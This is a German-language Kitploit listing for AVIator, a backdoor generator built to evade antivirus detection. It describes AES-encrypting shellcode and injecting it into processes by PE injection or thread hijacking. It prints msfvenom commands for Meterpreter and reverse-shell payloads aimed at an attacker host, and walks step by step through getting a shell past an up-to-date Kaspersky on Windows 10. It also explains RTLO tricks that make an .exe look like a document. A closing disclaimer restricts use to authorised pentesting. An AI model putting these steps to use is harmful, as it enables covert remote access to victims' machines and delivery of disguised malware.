Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ch0pin/aviator
Encryption/Decryption ToolsExploit FrameworksPayload GenerationShellcodePenetration TestingRed TeamingArchived
GitHubch0pin/aviator

AVIator

Antivirus evasion project

Repository anzeigen
1.2k230vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

AviAtor auf NETCore 5 portiert mit aktualisierter Benutzeroberfläche

AV|Ator

Über://name

AV: AntiVirus

Ator: Ist ein Schwertkämpfer, Alchemist, Wissenschaftler, Magier, Gelehrter und Ingenieur, mit der Fähigkeit, manchmal Gegenstände aus dem Nichts zu erschaffen (https://en.wikipedia.org/wiki/Ator)

Über://Zweck

AV|Ator ist ein Backdoor-Generator-Tool, das kryptografische und Injektionstechniken verwendet, um die AV-Erkennung zu umgehen. Genauer gesagt:

  • Es verwendet AES-Verschlüsselung, um einen gegebenen Shellcode zu verschlüsseln
  • Es erzeugt eine ausführbare Datei, die die verschlüsselte Nutzlast enthält
  • Der Shellcode wird entschlüsselt und mittels verschiedener Injektionstechniken in das Zielsystem injiziert

[https://attack.mitre.org/techniques/T1055/]:

  1. Injektion von ausführbaren Portables, bei der schädlicher Code direkt in den Prozess geschrieben wird (ohne eine Datei auf der Festplatte) und dann die Ausführung entweder mit zusätzlichem Code oder durch Erstellen eines Remote-Threads ausgelöst wird. Die Verschiebung des injizierten Codes führt zu der zusätzlichen Anforderung, Speicherverweise neu zuzuordnen. Variationen dieser Methode, wie reflective DLL-Injection (Schreiben einer selbstabbildenden DLL in einen Prozess) und Memory-Modul (Abbilden einer DLL beim Schreiben in den Prozess), umgehen das Problem der Adressverschiebung.

  2. Thread Execution Hijacking, bei dem schädlicher Code oder der Pfad zu einer DLL in einen Thread eines Prozesses injiziert wird. Ähnlich wie bei Process Hollowing muss der Thread zuerst angehalten werden.

Verwendung

Die Anwendung hat ein Formular, das aus drei Haupteingaben besteht (siehe Screenshot unten):

Screenshot 2019-04-29 at 11 41 21

  1. Ein Textfeld, das den zur Verschlüsselung des Shellcodes verwendeten Schlüssel enthält
  2. Ein Textfeld, das den für die AES-Verschlüsselung verwendeten IV enthält
  3. Ein Textfeld, das den Shellcode enthält

Wichtiger Hinweis: Der Shellcode sollte als C#-Byte-Array angegeben werden.

Die Standardwerte enthalten einen Shellcode, der notepad.exe (32-Bit) ausführt. Diese Demo dient als Hinweis darauf, wie der Code formatiert sein sollte (mit msfvenom kann dies einfach mit dem Schalter -f csharp erreicht werden, z.B. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

Nach dem Ausfüllen der bereitgestellten Eingaben und der Auswahl des Ausgabepfads wird eine ausführbare Datei gemäß den gewählten Optionen generiert.

RTLO-Option

Einfach ausgedrückt: Eine ausführbare Datei so manipulieren, dass sie eine „harmlose“ Erweiterung wie ‚pdf‘, ‚txt‘ usw. zu haben scheint. Z.B. wird die Datei „testcod.exe“ als „tesexe.doc“ interpretiert.

Seien Sie sich bewusst, dass einige Antivirenprogramme die Manipulation allein als Malware alarmieren.

Benutzerdefiniertes Symbol festlegen

Ich denke, jeder weiß, was das ist :)

Umgehen von Kaspersky AV auf einem Win 10 x64 Host (TESTFALL)

Erhalten einer Shell auf einem Windows 10-Rechner mit vollständig aktualisierter Kaspersky AV

Zielmaschine: Windows 10 x64

  1. Erstellen der Nutzlast mit msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Verwenden Sie AVIator mit den folgenden Einstellungen

    Ziel-OS-Architektur: x64

    Injektionstechnik: Thread Hijacking (Shellcode-Architektur: x64, OS-Architektur: x64)

    Zielprozess: explorer (Standardeinstellung belassen)

  3. Stellen Sie den Listener auf dem Angreifer-Rechner ein

  4. Führen Sie die generierte exe auf dem Opfer-Rechner aus

Installation

Windows:

Entweder das Projekt kompilieren oder die bereits kompilierte ausführbare Datei aus dem folgenden Ordner herunterladen:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Mono entsprechend Ihrer Linux-Distribution installieren, die Binärdateien herunterladen und ausführen

z.B. in Kali:

root@kitploit:~
   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

Danksagungen

An Damon Mohammadbagher für das Verschlüsselungsverfahren

Haftungsausschluss

Ich habe diese App entwickelt, um die anspruchsvollen Herausforderungen des Pentest-Prozesses zu bewältigen, und dies ist der EINZIGE WEG, wie diese App verwendet werden sollte. Stellen Sie sicher, dass Sie die erforderliche Berechtigung haben, sie gegen ein System einzusetzen, und verwenden Sie sie niemals für illegale Zwecke.

Tool herunterladen